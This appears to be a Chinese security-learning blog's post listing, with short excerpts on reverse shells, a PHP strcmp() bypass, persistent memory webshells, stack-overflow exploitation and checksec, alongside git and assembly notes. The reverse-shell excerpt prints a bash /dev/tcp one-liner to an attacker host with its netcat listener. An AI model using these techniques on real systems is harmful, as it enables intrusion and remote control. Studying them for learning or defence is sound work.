- 博客(9)
- 收藏
- 关注
RSS订阅原创 反弹shell
反弹 shell的几种方式linux文件描述符:linux shell下有三种标准的文件描述符,分别如下:文件描述符 缩写 描述 0 STDIN 标准输入 1 STDOUT 标准输出 2 STDERR 标准错误输出 bash反弹 shell靶机:bash -I >&/dev/tcp/192.168.1.1/9999 0>&1攻击机:nc -nvlp 9999命令注入直接获..
2021-12-15 09:55:38
258
原创 php strcmp()漏洞
函数作用:字符串比较定义和用法:stcmp()函数比较两个字符串。注释:stcmp()函数是二进制安全的,且区分大小写。语法:strcmp(string1,string2)参数 描述 string1 必需。规定要比较的第一个字符串 string2 必需。规定要比较的第二个字符串 绕过strcmp():要求传入字符串。如果传入非字符串呢?结果函数报错!但是函数返回“0” 。虽然报错了但函数的判断却是“相等”如何传入非字符串?答案...
2021-12-15 09:17:13
349
原创 阿里云网盘链接
主要功能· 上传下载不限速· 不被打扰的干净空间· 文件分享无需登陆即可预览/下载· 视频逐帧圈点评论· 文件版本更新功能阿里云网盘 网页版链接:阿里云盘阿里云网盘下载链接:阿里云盘 - 公测进行中·阿里巴巴集团出品...
2021-11-30 14:15:19
1551
原创 git的使用
执行 'git help <command>' 来查看特定子命令主要的上层命令 add 添加文件内容至索引 am 应用邮箱格式的系列补丁 archive 基于一个指定的树创建文件存档 bisect 通过二分查找定位引入 bug 的提交 branch 列出、创建或删除分支 bundle...
2021-11-18 10:25:14
177
原创 不死码之内存码
内存马,通俗将就是不死????,就是会运行一段时间不退出的程序常驻PHP进程里,无限循环。生成过程:不死???? --> 上传到server --> server执行文件 --> server本地无线循环生成(一句话.php)两种不死????:网上流传的不死????ignore_user_abort(true):函数设置与客户几断开是否会终止脚本的执行。这里设置位true则忽略与用户的断开,即使与客户机断开脚本仍会执行 set_time_limit():函数设置脚
2021-11-16 16:45:59
1198
转载 手把手教你栈溢出从入门到放弃(下)
0x10 上期回顾上篇文章介绍了栈溢出的原理和两种执行方法,两种方法都是通过覆盖返回地址来执行输入的指令片段(shellcode)或者动态库中的函数(return2libc)。本篇会继续介绍另外两种实现方法。一种是覆盖返回地址来执行内存内已有的代码片段(ROP),另一种是将某个函数的地址替换成另一个函数的地址(hijack GOT)。0x20 相关知识0x21 寄存器在上篇的背景知识中,我们提到了函数状态相关的三个寄存器--esp,ebp,eip。下面的内容会涉及更多的寄存器,所以我们大
2021-11-11 14:50:24
875
转载 手把手教你栈溢出从入门到放弃(上)
0x00 写在最前面开场白:快报快报!今天是2017 Pwn2Own黑客大赛的第一天,长亭安全研究实验室在比赛中攻破Linux操作系统和Safari浏览器(突破沙箱且拿到系统最高权限),积分14分,在11支队伍中暂居 Master of Pwn 第一名。作为热爱技术乐于分享的技术团队,我们开办了这个专栏,传播普及计算机安全的“黑魔法”,也会不时披露长亭安全实验室的最新研究成果。安全领域博大精深,很多童鞋都感兴趣却苦于难以入门,不要紧,我们会从最基础的内容开始,循序渐进地讲给大家。技术长路漫漫,我们携
2021-11-11 14:47:57
553
原创 checksec及其保护机制
保护机制分析Arch:程序构架信息,判断是64位还是32位,exp编写的时候是p64还是p32canary(栈保护):栈溢出保护是一种缓存区溢出攻击手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cokie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉,导致栈保护检查失败...
2021-11-11 09:26:50
1199
转载 汇编小总结
I. 单元、位和字节·BIT(位)-电脑数据量的最小单元,可以是0或者1。例:00000001=1;00000010=2;00000011=3·BYTE(字节)-一个字节包含8个位,所以一个字节最大值是255(0-255)。为了方便阅读,我们通常使用16进制来表示。·WORD(字)-一个字由两个字节组成,共有16位。一个字的最大值是0FFFFh(或者是65535d)(h代表16进制,d代表10进制)。·DOUBLEWORD(双字DWORD)-一个双字包含两...
2021-06-08 09:22:37
1338
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人